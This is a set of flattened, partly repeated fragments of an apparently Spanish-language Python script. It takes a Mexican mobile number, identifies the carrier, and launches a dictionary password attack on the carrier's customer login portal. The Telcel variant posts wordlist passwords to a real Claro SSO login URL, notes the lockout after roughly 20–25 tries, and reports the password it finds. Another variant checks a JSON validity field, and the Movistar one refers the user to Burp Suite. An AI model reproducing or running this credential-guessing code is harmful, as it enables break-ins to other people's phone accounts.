def ataqueDiccionario(self): colores.textPrimario(" >>> Casi empezamos ") _contraseñas = validacion.leerContraseñas() colores.hr() colores.textPrimario(" >>> Atancando ... \n") for _contraseña in _contraseñas: _contraseña = _contraseña.rstrip('\n') _response = self.ataque(self.numero, _contraseña) print(" Probando:", _contraseña.ljust(30), "\033[0;m", end='\r') if _response.json()["objectResponse"]["esValido"]: colores.hr() colores.textSuccess("\t\t\t[ Contraseña correcta : " + _contraseña + "]") colores.hr() exit() colores.hr() colores.textError("\t\t\t[ Contraseña no encontrada ]") colores.hr() exit()
def ataqueDiccionario(self): colores.textPrimario(" >>> Tranquilo vaquero ") colores.textError( " Movistar tiene una extraña y/o segura forma de validar el inicio de sesión " ) colores.textError( " [ cookies, parametros, sesiones, valores aleatorios ] ") colores.textPrimario( " Es mucho más fácil utilizar burpsuit para el ataque ;)") colores.hr() exit()
def leerContraseñas(_msj=""): if _msj != "": colores.textError(_msj) _archivo = colores.inputBold(' ¿ Cual es el nombre del diccionario ? : ') if not os.path.exists(_archivo): leerContraseñas("El archivo no existe") _f = open(_archivo, "r") _contraseñas = _f.readlines() _f.close() return _contraseñas
def main(_numero): _celular = validacion.comprobarCompañia(_numero) colores.textBold(" Número : " + _celular.numero) colores.textBold(" Nombre de Compañia : " + _celular.compañia) colores.textBold(" ¿ Registado en la plataforma de la compañia ? : " + str(_celular.registradoWeb)) colores.hr() if _celular.registradoWeb: colores.textPrimario(" >>> Confirmar ataque") _confirmarAtaque = colores.inputBold(' Se puede realizar un ataque de diccionario, ¿Quieres intentarlo? (s/n) : ') colores.hr() if _confirmarAtaque == 's' or _confirmarAtaque == 'S': _celular.ataqueDiccionario() else: colores.textError(" >>> Ataque no ejecutado \n") exit() else: colores.textError(' Con base en la "euristica" ( 3 ifs ) de este poderoso script') colores.textError(' Es imposible realizar un ataque de diccionario en su portal') colores.hr() exit()
def ataqueDiccionario(self): if not self.bloqueado: colores.textPrimario(" >>> Casi empezamos ") colores.textError( " El sistema de Telcel es 'bueno' por lo que al 20-25 intento se bloquea temporalmente (10 min aprox)" ) _archivo = colores.inputBold(" ¿ Quieres continuar s/n ? : ") if _archivo != 's': colores.hr() colores.textError(" >>> Bien pensado ;)") colores.hr() exit() colores.hr() colores.textPrimario(" >>> Atancando ... \n") _contraseñas = validacion.leerContraseñas() for _contraseña in _contraseñas: _contraseña = _contraseña.rstrip('\n') _response = requests.post( 'https://sso.claro.com:9080/login?sitedomain=https://www.mitelcel.com/mitelcel&CCode=52&Type=MSISDN&Invocation=iFrame', headers=self.headers(), data=self.data(self.numero, _contraseña), timeout=50) print(" Probando:", _contraseña.ljust(30), "\033[0;m", end='\r') if 'intentos' in _response.text: colores.hr() colores.textError("\t\t\t Ya nos bloquearon :( ") colores.hr() exit() if 'incorrecta' not in _response.text: colores.hr() colores.textSuccess( "\t\t\t[ Contraseña correcta ( 90% seguro ) : " + _contraseña + "]") colores.hr() exit() colores.textError("\t\t\t[ Contraseña no encontrada ]") colores.hr() exit() else: colores.textError(" ¡¡¡ CUIDADO !!! \n") colores.textError( "La cuenta esta bloqueada temporalmente. Ejecute el script más tarde. " ) colores.hr() exit()
else: colores.textError(" >>> Ataque no ejecutado \n") exit() else: colores.textError(' Con base en la "euristica" ( 3 ifs ) de este poderoso script') colores.textError(' Es imposible realizar un ataque de diccionario en su portal') colores.hr() exit() if __name__ == "__main__": banner() if len(sys.argv) <= 1: colores.textError(" Debes de pasar como parametro el número celular con un formato de 10 digito") colores.textError(" Ejemplo : python3" + sys.argv[0] + " 5511223344") colores.hr() exit() else: _check = validacion.comprobarEstructuraNumero(sys.argv[1]) if _check: main(sys.argv[1]) else: colores.textError(" Debes de pasar como parametro el número celular con un formato de 10 digito") colores.textError(" Ejemplo : python3" + sys.argv[0] + " 5511223344") colores.hr() exit()